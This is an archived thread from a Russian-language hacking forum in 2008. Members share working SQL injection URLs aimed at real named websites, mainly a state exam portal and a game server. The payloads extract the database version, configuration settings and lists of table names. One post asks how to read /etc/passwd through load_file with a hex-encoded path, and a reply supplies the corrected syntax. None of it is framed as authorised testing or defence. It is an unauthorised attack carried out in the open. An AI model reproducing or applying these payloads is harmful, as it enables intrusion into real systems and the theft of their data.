ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.06.2008, 11:10
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802
Репутация:
52
|
|
Свой вопрос снимаю=) сам же расписывал тут функцию substring и сам же не додумался ее использовать=)
|
|
|
14.06.2008, 11:33
|
|
Познающий
Регистрация: 30.04.2007
Сообщений: 67
Провел на форуме:
287714
Репутация:
40
|
|
посотрите ентот сайтик пжалуйста, то чет я не чего стоищего найтии немогу! http://rikz.unibel.by/
|
|
|
|
14.06.2008, 12:18
|
|
Новичок
Регистрация: 23.08.2007
Сообщений: 8
Провел на форуме:
49296
Репутация:
2
|
|
Есть срочный вопрос:
Составляю запрос:
Код:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+order+by+10--
Вылазит такое:
Unknown column '10' in 'order clause'
Ето то понятно, но что странное:
Составляю запрос:
Код:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+order+by+3--
Страница вообще изчезает, да и в коде ничего нет.
Иду дальше:
Код:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-+union+select 1,2,3--
и тут мистика: страница вообще не грузится.
Ладно, я подумал, что так и должно быть, попробовал такое:
Код:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,version()--
она опять не захотела грузица да и '+' изчезают и заменяются на пробелы(...
Что странное - то, что при других циферках вылазиют ошибки типа нет такой таблицы или числа. А именно при "3" страница не грузица вообще...
Если кто знает подскажите плиз... |
|
|
|
14.06.2008, 12:36
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 sakh_rider
Только смотри внимательно,вывод есть,но не как обычно 
_http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=1+union+select+1,2,@@version+--+
5.0.51a
ege@pro.iot.ru |
|
|
|
14.06.2008, 12:42
|
|
Новичок
Регистрация: 23.08.2007
Сообщений: 8
Провел на форуме:
49296
Репутация:
2
|
|
Сообщение от jokester
2 sakh_rider
Только смотри внимательно,вывод есть,но не как обычно
_http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=1+union+select+1,2,@@version+--+
5.0.51a
ege@pro.iot.ru Ух ты, я действительно сразу не заметил, все думал что ето за циферки в адрес лезут... Эхх.. сенкс +
|
|
|
|
14.06.2008, 12:46
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(setting,0x2e ,value)+from+ege_astats_config+limit+1,1--
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(setting,0x2e ,value)+from+ege_astats_config+limit+2,1--
почему не подходит? =\
http://www1.ege.edu.ru/administrator/components/com_astatspro/administration/index.php?
а вообще, там около 150 таблиц, мне влом все перебирать
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(table_schema ,0x2e,table_name)+from+information_schema.tables+l imit+18,1--
вот эта с конфигом
|
|
|
|
14.06.2008, 12:59
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
http://la2.emserv.ru/indexx.php?start_from=10&ucat=&archive=&subaction= &id='&lang=ru можно че сделать? а то я уже совсем запутался ;(
|
|
|
|
14.06.2008, 13:07
|
|
Новичок
Регистрация: 23.08.2007
Сообщений: 8
Провел на форуме:
49296
Репутация:
2
|
|
Сообщение от Piflit
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(setting,0x2e ,value)+from+ege_astats_config+limit+1,1--
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(setting,0x2e ,value)+from+ege_astats_config+limit+2,1--
почему не подходит? =\
http://www1.ege.edu.ru/administrator/components/com_astatspro/administration/index.php?
а вообще, там около 150 таблиц, мне влом все перебирать
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(table_schema ,0x2e,table_name)+from+information_schema.tables+l imit+18,1--
вот эта с конфигом
Буду перебирать далее сенкс +)
|
|
|
|
14.06.2008, 14:37
|
|
Новичок
Регистрация: 23.08.2007
Сообщений: 8
Провел на форуме:
49296
Репутация:
2
|
|
Еще вопросик: как можно ето "etc/passwd" превратить в нечто подобное
Код:
0 x какие-то_символы
. Как я понимаю это hex.
Кто-нить знает как можно закодировать?
А то обычный
Код:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,load_file(ect/passwd)+from+ege_users+limit+2,1--
не показывает( |
|
|
|
14.06.2008, 14:42
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
1. http://hack-shop.org.ru/tools-code-encode
>SQL Hex + 0x | Path :
2. правильно load_file('/etc/passwd')
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
